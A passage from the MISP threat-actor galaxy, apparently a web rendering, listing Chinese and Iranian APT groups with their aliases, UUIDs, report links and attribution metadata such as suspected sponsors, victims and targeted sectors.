- https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/ - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/ - webarchive
- https://securelist.com/luckymouse-ndisproxy-driver/87914/ - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.09.17.Operation_Iron_Tiger/Operation%20Iron%20Tiger%20Appendix.pdf - webarchive
- https://arstechnica.com/information-technology/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ - webarchive
- https://securelist.com/luckymouse-hits-national-data-center/86083/ - webarchive
- https://attack.mitre.org/groups/G0027/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-union - webarchive
- https://unit42.paloaltonetworks.com/atoms/iron-taurus/ - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['United States', 'United Kingdom', 'France', 'Japan', 'Taiwan', 'India', 'Canada', 'China', 'Thailand', 'Israel', 'Australia', 'Republic of Korea', 'Russia', 'Iran', 'Turkey'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Technology', 'Government, Administration', 'Defense'] |
Related clusters
To see the related clusters, click here.
APT10
menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT10.
Known Synonyms |
---|
ATK41 |
BRONZE RIVERSIDE |
CVNX |
Cloud Hopper |
G0045 |
Granite Taurus |
HOGFISH |
Menupass Team |
POTASSIUM |
Red Apollo |
STONE PANDA |
TA429 |
happyyongzi |
Internal MISP references
UUID 56b37b05-72e7-4a89-ba8a-61ce45269a8c
which can be used as unique global reference for APT10
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-10 - webarchive
- https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html - webarchive
- https://www.eweek.com/security/chinese-nation-state-hackers-target-u.s-in-operation-tradesecret - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/ - webarchive
- https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf - webarchive
- https://www.us-cert.gov/sites/default/files/publications/IR-ALERT-MED-17-093-01C-Intrusions_Affecting_Multiple_Victims_Across_Multiple_Sectors.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html - webarchive
- https://www.fbi.gov/news/stories/chinese-hackers-indicted-122018 - webarchive
- https://attack.mitre.org/groups/G0045/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-riverside - webarchive
- https://unit42.paloaltonetworks.com/atoms/granite-taurus - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new - webarchive
- https://www.crowdstrike.com/blog/two-birds-one-stone-panda/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Japan', 'India', 'South Africa', 'South Korea', 'Sweden', 'United States', 'Canada', 'Australia', 'France', 'Finland', 'United Kingdom', 'Brazil', 'Thailand', 'Switzerland', 'Norway'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
Hellsing
This threat actor uses spear-phishing techniques to compromise diplomatic targets in Southeast Asia, India, and the United States. It also seems to have targeted the APT 30. Possibly uses the same infrastructure as Mirage
Internal MISP references
UUID af482dde-9e47-48d5-9cb2-cf8f6d6303d3
which can be used as unique global reference for Hellsing
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Malaysia', 'Indonesia', 'Philippines', 'United States', 'India'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Infrastructure', 'Diplomacy'] |
Night Dragon
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Night Dragon.
Known Synonyms |
---|
G0014 |
Internal MISP references
UUID b3714d59-b61e-4713-903a-9b4f04ae7f3d
which can be used as unique global reference for Night Dragon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Related clusters
To see the related clusters, click here.
APT15
This threat actor uses phishing techniques to compromise the networks of foreign ministries of European countries for espionage purposes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT15.
Known Synonyms |
---|
BRONZE DAVENPORT |
BRONZE IDLEWOOD |
BRONZE PALACE |
G0004 |
Ke3Chang |
Lurid |
Metushy |
Mirage |
NICKEL |
Nylon Typhoon |
Playful Dragon |
Red Vulture |
Royal APT |
Social Network Team |
VIXEN PANDA |
Internal MISP references
UUID 3501fbf2-098f-47e7-be6a-6b0ff5742ce8
which can be used as unique global reference for APT15
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html - webarchive
- http://arstechnica.com/security/2015/04/elite-cyber-crime-group-strikes-back-after-attack-by-rival-apt-gang/ - webarchive
- https://github.com/nccgroup/Royal_APT - webarchive
- https://www.cfr.org/interactive/cyber-operations/mirage - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf - webarchive
- https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ - webarchive
- https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - webarchive
- https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/ - webarchive
- https://attack.mitre.org/groups/G0004/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-palace - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['European Union', 'India', 'United Kingdom', 'Germany'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Government, Administration'] |
Related clusters
To see the related clusters, click here.
APT14
PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy. In addition to maritime operations in this region, Anchor Panda also heavily targeted western companies in the US, Germany, Sweden, the UK, and Australia, and other countries involved in maritime satellite systems, aerospace companies, and defense contractors. Not surprisingly, embassies and diplomatic missions in the region, foreign intelligence services, and foreign governments with space programs were also targeted.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT14.
Known Synonyms |
---|
ALUMINUM |
ANCHOR PANDA |
QAZTeam |
Internal MISP references
UUID c82c904f-b3b4-40a2-bf0d-008912953104
which can be used as unique global reference for APT14
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'United Kingdom', 'Germany', 'Australia', 'Sweden'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
motive | Espionage |
targeted-sector | ['Other', 'Aerospace', 'Defense', 'Intelligence', 'Maritime', 'Military', 'Space'] |
Related clusters
To see the related clusters, click here.
APT21
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT21.
Known Synonyms |
---|
HAMMER PANDA |
NetTraveler |
TEMP.Zhenbao |
Internal MISP references
UUID b80f4788-ccb2-466d-ae16-b397159d907e
which can be used as unique global reference for APT21
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/research/35936/nettraveler-is-running-red-star-apt-attacks-compromise-high-profile-victims/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/nettraveler - webarchive
- https://www.kaspersky.com/about/press-releases/2013_kaspersky-lab-uncovers--operation-nettraveler--a-global-cyberespionage-campaign-targeting-government-affiliated-organizations-and-research-institutes - webarchive
- https://www.kaspersky.com/about/press-releases/2014_nettraveler-gets-a-makeover-for-10th-anniversary - webarchive
- https://unit42.paloaltonetworks.com/nettraveler-spear-phishing-email-targets-diplomat-of-uzbekistan/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests - webarchive
- http://www.darkreading.com/endpoint/chinese-cyberspies-pivot-to-russia-in-wake-of-obama-xi-pact/d/d-id/1324242 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Mongolia', 'Kazakhstan', 'Tajikistan', 'Germany', 'United Kingdom', 'India', 'Kyrgyzstan', 'South Korea', 'United States', 'Chile', 'Russia', 'China', 'Spain', 'Canada', 'Morocco'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
DAGGER PANDA
Operate since at least 2011, from several locations in China, with members in Korea and Japan as well. Possibly linked to Onion Dog. This threat actor targets government institutions, military contractors, maritime and shipbuilding groups, telecommunications operators, and others, primarily in Japan and South Korea.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DAGGER PANDA.
Known Synonyms |
---|
IceFog |
PLA Unit 69010 |
Red Wendigo |
RedFoxtrot |
Trident |
Internal MISP references
UUID 32c534b9-abec-4823-b223-a810f897b47b
which can be used as unique global reference for DAGGER PANDA
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/the-icefog-apt-a-tale-of-cloak-and-three-daggers/57331/ - webarchive
- https://securelist.com/the-icefog-apt-hits-us-targets-with-java-backdoor/58209/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/icefog - webarchive
- https://d2538mqrb7brka.cloudfront.net/wp-content/uploads/sites/43/2018/03/20133739/icefog.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['South Korea', 'United States', 'Japan', 'Germany', 'China'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Other', 'Maritime', 'Military', 'Government, Administration', 'Telecoms'] |
APT24
The Pitty Tiger group has been active since at least 2011. They have been seen using HeartBleed vulnerability in order to directly get valid credentials
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT24.
Known Synonyms |
---|
G0011 |
PITTY PANDA |
Temp.Pittytiger |
Internal MISP references
UUID 4d37813c-b8e9-4e58-a758-03168d8aa189
which can be used as unique global reference for APT24
in MISP communities and other software using the MISP galaxy
External references
- http://blog.airbuscybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2 - webarchive
- http://blog.cassidiancybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2 - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/2014.07.11.Pitty_Tiger/Pitty_Tiger_Final_Report.pdf - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/ - webarchive
- https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html - webarchive
- https://attack.mitre.org/groups/G0011 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Related clusters
To see the related clusters, click here.
Roaming Tiger
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Roaming Tiger.
Known Synonyms |
---|
BRONZE WOODLAND |
Rotten Tomato |
Internal MISP references
UUID 1fb177c1-472a-4147-b7c4-b5269b11703d
which can be used as unique global reference for Roaming Tiger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Beijing Group
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Beijing Group.
Known Synonyms |
---|
Elderwood |
Elderwood Gang |
G0066 |
SIG22 |
SNEAKY PANDA |
Internal MISP references
UUID da754aeb-a86d-4874-b388-d1d2028a56be
which can be used as unique global reference for Beijing Group
in MISP communities and other software using the MISP galaxy
External references
- https://www.cfr.org/interactive/cyber-operations/sneaky-panda - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=3b0d679a-3707-4075-a2a9-37d1af16d411&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://attack.mitre.org/groups/G0066/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Canada', 'United Kingdom', 'Switzerland', 'Hong Kong', 'Australia', 'India', 'Taiwan', 'China', 'Denmark'] |
cfr-target-category | ['Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
RADIO PANDA
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RADIO PANDA.
Known Synonyms |
---|
Shrouded Crossbow |
Internal MISP references
UUID c92d7d31-cfd9-4309-b6c4-b7eb1e85fa7e
which can be used as unique global reference for RADIO PANDA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
APT.3102
Internal MISP references
UUID f33fd440-93ee-41e5-974a-be9343e18cdf
which can be used as unique global reference for APT.3102
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
SAMURAI PANDA
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SAMURAI PANDA.
Known Synonyms |
---|
PLA Navy |
Wisp Team |
Internal MISP references
UUID 2fb07fa4-0d7f-43c7-8ff4-b28404313fe7
which can be used as unique global reference for SAMURAI PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'United Kingdom', 'Hong Kong'] |
cfr-target-category | ['Private sector', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
IMPERSONATING PANDA
Internal MISP references
UUID b56ecbda-6b2a-4aa9-b592-d9a0bc810ec1
which can be used as unique global reference for IMPERSONATING PANDA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
APT20
We’ve uncovered some new data and likely attribution regarding a series of APT watering hole attacks this past summer. Watering hole attacks are an increasingly popular component of APT campaigns, as many people are more aware of spear phishing and are less likely to open documents or click on links in unsolicited emails. Watering hole attacks offer a much better chance of success because they involve compromising legitimate websites and installing malware intended to compromise website visitors. These are often popular websites frequented by people who work in specific industries or have political sympathies to which the actors want to gain access. In contrast to many other APT campaigns, which tend to rely heavily on spear phishing to gain victims, “th3bug” is known for compromising legitimate websites their intended visitors are likely to frequent. Over the summer they compromised several sites, including a well-known Uyghur website written in that native language.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT20.
Known Synonyms |
---|
Crawling Taurus |
TH3Bug |
VIOLIN PANDA |
Internal MISP references
UUID 8bcd855f-a4c1-453a-bede-ff36582f4f40
which can be used as unique global reference for APT20
in MISP communities and other software using the MISP galaxy
External references
- http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/ - webarchive
- https://www.fox-it.com/nl/actueel/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/ - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/crawling-taurus/ - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
TOXIC PANDA
A group targeting dissident groups in China and at the boundaries.
Internal MISP references
UUID 1514546d-f6ea-4af3-bbea-24d6fd9e6761
which can be used as unique global reference for TOXIC PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
TEMPER PANDA
China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors. This threat actor targets prodemocratic activists and organizations in Hong Kong, European and international financial institutions, and a U.S.-based think tank.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TEMPER PANDA.
Known Synonyms |
---|
Admin338 |
G0018 |
MAGNESIUM |
Team338 |
admin@338 |
Internal MISP references
UUID ac4bce1f-b3ec-4c44-bd36-b6cc986b319b
which can be used as unique global reference for TEMPER PANDA
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html - webarchive
- https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/admin338 - webarchive
- https://attack.mitre.org/groups/G0018/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Hong Kong', 'United States'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Activists', 'Trade', 'Finance', 'Political party'] |
Related clusters
To see the related clusters, click here.
APT23
TrendMicro described Tropic Trooper in a 2015 report as: 'Taiwan and the Philippines have become the targets of an ongoing campaign called Operation TropicTrooper. Active since 2012, the attackers behind the campaign haveset their sights on the Taiwanese government as well as a number of companies in the heavy industry. The same campaign has also targeted key Philippine military agencies.'
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT23.
Known Synonyms |
---|
BRONZE HOBART |
Earth Centaur |
G0081 |
KeyBoy |
PIRATE PANDA |
Red Orthrus |
Tropic Trooper |
Internal MISP references
UUID 7f16d1f5-04ee-4d99-abf0-87e1f23f9fee
which can be used as unique global reference for APT23
in MISP communities and other software using the MISP galaxy
External references
- https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/ - webarchive
- http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/ - webarchive
- http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/ - webarchive
- https://blog.lookout.com/titan-mobile-threat - webarchive
- https://attack.mitre.org/groups/G0081/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-hobart - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
targeted-sector | ['Military', 'Government, Administration'] |
Flying Kitten
Activity: defense and aerospace sectors, also interested in targeting entities in the oil/gas industry.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Flying Kitten.
Known Synonyms |
---|
Ajax Security Team |
AjaxSecurityTeam |
Group 26 |
Saffron Rose |
SaffronRose |
Sayad |
Internal MISP references
UUID ba724df5-9aa0-45ca-8e0e-7101c208ae48
which can be used as unique global reference for Flying Kitten
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf - webarchive
- https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/saffron-rose - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Iranian internet activists'] |
cfr-target-category | ['Military', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Aerospace', 'Defense', 'Gas', 'Oil'] |
Related clusters
To see the related clusters, click here.
Cutting Kitten
One of the threat actors responsible for the denial of service attacks against U.S in 2012–2013. Three individuals associated with the group—believed to be have been working on behalf of Iran’s Islamic Revolutionary Guard Corps—were indicted by the Justice Department in 2016.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cutting Kitten.
Known Synonyms |
---|
ITsecTeam |
Internal MISP references
UUID 11e17436-6ede-4733-8547-4ce0254ea19e
which can be used as unique global reference for Cutting Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Bank of America', 'US Bancorp', 'Fifth Third Bank', 'Citigroup', 'PNC', 'BB&T', 'Wells Fargo', 'Capital One', 'HSBC', 'AT&T', 'NYSE'] |
cfr-type-of-incident | ['Denial of service'] |
country | IR |
Charming Kitten
Charming Kitten (aka Parastoo, aka Newscaster) is an group with a suspected nexus to Iran that targets organizations involved in government, defense technology, military, and diplomacy sectors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Charming Kitten.
Known Synonyms |
---|
CharmingCypress |
G0058 |
Group 83 |
NewsBeef |
Newscaster |
Parastoo |
iKittens |
Internal MISP references
UUID f98bac6b-12fd-4cad-be84-c84666932232
which can be used as unique global reference for Charming Kitten
in MISP communities and other software using the MISP galaxy
External references
- https://en.wikipedia.org/wiki/Operation_Newscaster - webarchive
- https://iranthreats.github.io/resources/macdownloader-macos-malware/ - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks/file-2581720763-pdf.pdf - webarchive
- https://www.forbes.com/sites/thomasbrewster/2017/07/27/iran-hackers-oilrig-use-fake-personas-on-facebook-linkedin-for-cyberespionage/ - webarchive
- https://cryptome.org/2012/11/parastoo-hacks-iaea.htm - webarchive
- https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf - webarchive
- https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/ - webarchive
- https://www.verfassungsschutz.de/download/broschuere-2016-10-bfv-cyber-brief-2016-04.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/newscaster - webarchive
- https://www.washingtontimes.com/news/2014/may/29/iranian-hackers-sucker-punch-us-defense-heads-crea/ - webarchive
- https://securelist.com/freezer-paper-around-free-meat/74503/ - webarchive
- https://www.scmagazine.com/home/security-news/cybercrime/hbo-breach-accomplished-with-hard-work-by-hacker-poor-security-practices-by-victim/ - webarchive
- http://www.arabnews.com/node/1195681/media - webarchive
- https://cyware.com/news/iranian-apt-charming-kitten-impersonates-clearsky-the-security-firm-that-uncovered-its-campaigns-7fea0b4f - webarchive
- https://blog.certfa.com/posts/the-return-of-the-charming-kitten/ - webarchive
- https://www.justice.gov/opa/pr/former-us-counterintelligence-agent-charged-espionage-behalf-iran-four-iranians-charged-cyber - webarchive
- https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf - webarchive
- https://attack.mitre.org/groups/G0058/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['U.S. government/defense sector websites', 'Saudi Arabia', 'Israel', 'Iraq', 'United Kingdom'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Defense', 'Diplomacy', 'Military', 'Technology', 'Government, Administration'] |
Related clusters
To see the related clusters, click here.
APT33
Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT33.
Known Synonyms |
---|
APT 33 |
ATK35 |
COBALT TRINITY |
Elfin |
G0064 |
HOLMIUM |
MAGNALLIUM |
Peach Sandstorm |
Refined Kitten |
TA451 |
Internal MISP references
UUID 4f69ec6d-cb6b-42af-b8e2-920a2aa4be10
which can be used as unique global reference for APT33
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/more-than-a-dozen-obfuscated-apt33-botnets-used-for-extreme-narrow-targeting/ - webarchive
- https://www.brighttalk.com/webcast/10703/275683 - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-trinity - webarchive
- https://attack.mitre.org/groups/G0064/ - webarchive
- https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-33 - webarchive
- https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf - webarchive
- https://dragos.com/adversaries.html - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
capabilities | STONEDRILL wiper, variants of TURNEDUP malware |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Saudi Arabia', 'South Korea'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | IR |
mode-of-operation | IT network limited, information gathering against industrial orgs |
victimology | Petrochemical, Aerospace, Saudi Arabia |
Related clusters
To see the related clusters, click here.
Magic Kitten
Earliest activity back to November 2008. An established group of cyber attackers based in Iran, who carried on several campaigns in 2013, including a series of attacks targeting political dissidents and those supporting Iranian political opposition.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Magic Kitten.
Known Synonyms |
---|
Group 42 |
VOYEUR |
Internal MISP references
UUID 2e77511d-f72f-409e-9b64-e2a15efe9bf4
which can be used as unique global reference for Magic Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
